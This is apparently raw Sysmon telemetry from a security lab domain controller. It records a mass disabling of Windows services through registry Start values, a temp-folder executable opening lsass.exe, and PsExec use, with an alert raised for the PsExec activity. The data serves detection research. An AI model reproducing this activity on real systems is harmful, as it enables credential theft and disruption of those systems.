13241300x8000000000000000290770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sermouse\StartDWORD (0x00000004) 13241300x8000000000000000290769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Serial\StartDWORD (0x00000004) 13241300x8000000000000000290768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.066{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Serenum\StartDWORD (0x00000004) 13241300x8000000000000000290767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.065{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SerCx2\StartDWORD (0x00000004) 13241300x8000000000000000290766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.062{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SerCx\StartDWORD (0x00000004) 13241300x8000000000000000290765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SensrSvc\StartDWORD (0x00000004) 13241300x8000000000000000290764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SensorService\StartDWORD (0x00000004) 13241300x8000000000000000290763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SensorDataService\StartDWORD (0x00000004) 13241300x8000000000000000290762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SENS\StartDWORD (0x00000004) 13241300x8000000000000000290761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\seclogon\StartDWORD (0x00000004) 13241300x8000000000000000290760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sdstor\StartDWORD (0x00000004) 13241300x8000000000000000290759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sdbus\StartDWORD (0x00000004) 13241300x8000000000000000290758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\scmdisk0101\StartDWORD (0x00000004) 13241300x8000000000000000290757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\scmbus\ImagePath\SystemRoot\System32\drivers\scmbus.sys 12241200x8000000000000000290756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\scmbus\StartOverride 13241300x8000000000000000290755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.044{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\scmbus\StartDWORD (0x00000004) 10341000x8000000000000000290754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.044{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.044{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sbp2port\ImagePath\SystemRoot\System32\drivers\sbp2port.sys 12241200x8000000000000000290751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sbp2port\StartOverride 13241300x8000000000000000290750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sbp2port\StartDWORD (0x00000004) 13241300x8000000000000000290749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SamSs\StartDWORD (0x00000004) 13241300x8000000000000000290748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sacsvr\StartDWORD (0x00000004) 13241300x8000000000000000290747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sacdrv\ImagePath\SystemRoot\system32\DRIVERS\sacdrv.sys 13241300x8000000000000000290746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\sacdrv\StartDWORD (0x00000004) 13241300x8000000000000000290745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\s3cap\StartDWORD (0x00000004) 13241300x8000000000000000290744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\rspndr\StartDWORD (0x00000004) 13241300x8000000000000000290743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RSoPProv\StartDWORD (0x00000004) 13241300x8000000000000000290742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RpcLocator\StartDWORD (0x00000004) 13241300x8000000000000000290741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:43.029{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000290740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.029{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6A05-000000003802}6280C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.029{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6A05-000000003802}6280C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RemoteRegistry\StartDWORD (0x00000004) 13241300x8000000000000000290737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RemoteAccess\StartDWORD (0x00000004) 13241300x8000000000000000290736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ReFSv1\StartDWORD (0x00000004) 13241300x8000000000000000290735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.029{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ReFS\StartDWORD (0x00000004) 13241300x8000000000000000290734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RdpVideoMiniport\StartDWORD (0x00000004) 13241300x8000000000000000290733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RDPDR\StartDWORD (0x00000004) 13241300x8000000000000000290732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\rdpbus\StartDWORD (0x00000004) 13241300x8000000000000000290731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\rdbss\StartDWORD (0x00000004) 13241300x8000000000000000290730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RasSstp\StartDWORD (0x00000004) 13241300x8000000000000000290729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RasPppoe\StartDWORD (0x00000004) 13241300x8000000000000000290728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RasMan\StartDWORD (0x00000004) 13241300x8000000000000000290727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Rasl2tp\StartDWORD (0x00000004) 13241300x8000000000000000290726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RasGre\StartDWORD (0x00000004) 13241300x8000000000000000290725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RasAuto\StartDWORD (0x00000004) 13241300x8000000000000000290724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:43.013{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RasAgileVpn\StartDWORD (0x00000004) 10341000x8000000000000000290723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:43.013{C8EA50B7-12EA-6216-6A05-000000003802}62806424C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\RasAcd\StartDWORD (0x00000004) 13241300x8000000000000000290721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\QWAVEdrv\StartDWORD (0x00000004) 13241300x8000000000000000290720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\QWAVE\StartDWORD (0x00000004) 13241300x8000000000000000290719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\qlfcoei\ImagePath\SystemRoot\System32\drivers\qlfcoei.sys 12241200x8000000000000000290718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\qlfcoei\StartOverride 13241300x8000000000000000290717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\qlfcoei\StartDWORD (0x00000004) 13241300x8000000000000000290716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ql40xx2i\ImagePath\SystemRoot\System32\drivers\ql40xx2i.sys 12241200x8000000000000000290715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ql40xx2i\StartOverride 13241300x8000000000000000290714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ql40xx2i\StartDWORD (0x00000004) 13241300x8000000000000000290713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ql2300i\ImagePath\SystemRoot\System32\drivers\ql2300i.sys 12241200x8000000000000000290712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ql2300i\StartOverride 13241300x8000000000000000290711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ql2300i\StartDWORD (0x00000004) 13241300x8000000000000000290710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Psched\StartDWORD (0x00000004) 13241300x8000000000000000290709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ProfSvc\StartDWORD (0x00000004) 13241300x8000000000000000290708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Processor\StartDWORD (0x00000004) 13241300x8000000000000000290707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PrintNotify\StartDWORD (0x00000004) 13241300x8000000000000000290706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.997{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PptpMiniport\StartDWORD (0x00000004) 13241300x8000000000000000290705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Power\StartDWORD (0x00000004) 13241300x8000000000000000290704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PolicyAgent\StartDWORD (0x00000004) 13241300x8000000000000000290703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PlugPlay\StartDWORD (0x00000004) 10341000x8000000000000000290702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.982{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6905-000000003802}1000C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.982{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6905-000000003802}1000C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pla\StartDWORD (0x00000004) 23542300x8000000000000000290699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.982{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243084D50F0FEBE2E0159F6723F68725,SHA256=19225CD3E0D63C1D90BBD77F659DAB09E72001B8AFEE533FAFE1F71D043C6C2C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PhoneSvc\StartDWORD (0x00000004) 13241300x8000000000000000290697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PerfHost\StartDWORD (0x00000004) 13241300x8000000000000000290696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\percsas3i\ImagePath\SystemRoot\System32\drivers\percsas3i.sys 12241200x8000000000000000290695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\percsas3i\StartOverride 13241300x8000000000000000290694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\percsas3i\StartDWORD (0x00000004) 13241300x8000000000000000290693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\percsas2i\ImagePath\SystemRoot\System32\drivers\percsas2i.sys 12241200x8000000000000000290692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\percsas2i\StartOverride 